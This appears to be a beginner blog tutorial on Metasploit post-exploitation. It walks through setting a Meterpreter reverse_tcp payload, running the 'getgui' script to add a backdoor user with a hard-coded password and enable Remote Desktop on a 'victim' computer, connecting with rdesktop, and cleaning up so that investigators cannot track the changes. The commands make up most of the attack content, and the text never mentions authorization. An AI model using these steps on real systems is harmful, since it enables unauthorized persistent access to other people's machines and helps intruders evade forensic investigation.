5 Steps to Enable Remote Desktop Using Metasploit Meterpreter

Type : Tutorial

Level : Beginner, Medium

Last year when I'm teaching about computer security class, one student come and ask "can you give me simple tutorial how to use command prompt?", then I say "I don't think so it will be do in a short course because learning about command prompt you should practice everyday for first times and make it familiar like your mother tongue" from this situation I know that not every people know about command prompt or something related to console based. How about hacking?yep it's the same…sometimes newly learned they just follow tutorials, but didn't know what exactly they doing.

Today I will write simple tutorial how to enable Remote Desktop(use Remote Desktop Protocol on TCP port 3389) when you've already inside remote system using Metasploit Framework. This method should be useful if you have limitation how to use command prompt. In this case, we will utilize Carlos Perez's 'getgui' script, which enables Remote Desktop and creates a user account for you to log into it with.

Requirement :

1. Metasploit Framework

2. Backtrack 5(or another linux OS)

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter :

1. My favourite meterpreter is using reverse_tcp. If you also like to use reverse_tcp for your payload, you can use like the command below.

set payload windows/meterpreter/reverse_tcp

2. Inside the meterpreter, execute

meterpreter > run getgui -h

to view the help.

3. To add a user with username : valent and password : r4h45i4 and then enable the Remote Desktop Service

run getgui -u valent -p r4h45i4

Yep we already successfully created the user and activated the Remote Desktop Service.

Please note the last command "For cleanup use command : run multi_console_command….bla…bla….bla" it will be used after finish using the Remote Desktop Service of victim computer.

4. To connect to victim using remote desktop, we can use rdesktop program (it's already installed on backtrack).

rdesktop -u <username>  -p <password> <ip-address-target>

initializing……and then….

5. You also should remember that when you add user it's mean that you are adding one new user on remote computer. Be wise to use this methods, because when you do much changes, you also will left a lot of changes on remote computer and it can be tracked by investigators  . To clean up the user we've already created before(you can see on step 3).

Finish…

hope it's useful for you…any question?just drop on comment box.